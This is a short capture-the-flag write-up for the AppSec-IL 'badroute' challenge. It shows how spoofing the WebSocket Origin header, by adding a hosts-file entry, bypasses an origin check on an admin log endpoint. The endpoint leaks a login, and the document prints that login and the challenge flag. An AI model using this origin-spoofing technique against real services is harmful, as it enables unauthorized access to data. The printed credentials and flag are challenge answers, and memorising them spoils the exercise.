Look at this file: `https://badroute.appsecil.ctf.today/main.b8c73a19106d54f04466.js`

You can see:

```js
connect(){new WebSocket("wss://securityocean.corp.local/admin/log")}
```

Yes, so we try to connect ws:

```js
const s = new WebSocket('wss://badroute.appsecil.ctf.today/admin/log')
```

Server response:

```
HTTP/1.1 101 Switching Protocols
upgrade: websocket
connection: Upgrade
sec-websocket-accept: +ZA/4NNH14vcfGv+BZhGv7gAwkY=

{"error":"Bad origin provided, abort connection. Expect: ['securityocean.corp.local']"}
```

So clearly, we add securityocean.corp.local with same ip to hosts file and go to `https://securityocean.corp.local`
and then:

```
const s = new WebSocket('wss://badroute.appsecil.ctf.today/admin/log')
```

The request look like this:

```
GET /admin/log HTTP/1.1
Host: badroute.appsecil.ctf.today
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Upgrade: websocket
Origin: https://securityocean.corp.local
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: vrVtVO/AoKcH2erLfbgkTQ==
```

Server response:

```
{"msg":{"email":"[email protected]","pass":"tSec43PasswordLivna "},"error":"Incorrect username or password."}
```

Using this credentials to login `https://badroute.appsecil.ctf.today/login`, we got flag:

```
{"msg":"Congrats! Your Flag is AppSec-IL{Th3_W3bS0ckets_N33ds_2BS3cre}","status":200}
```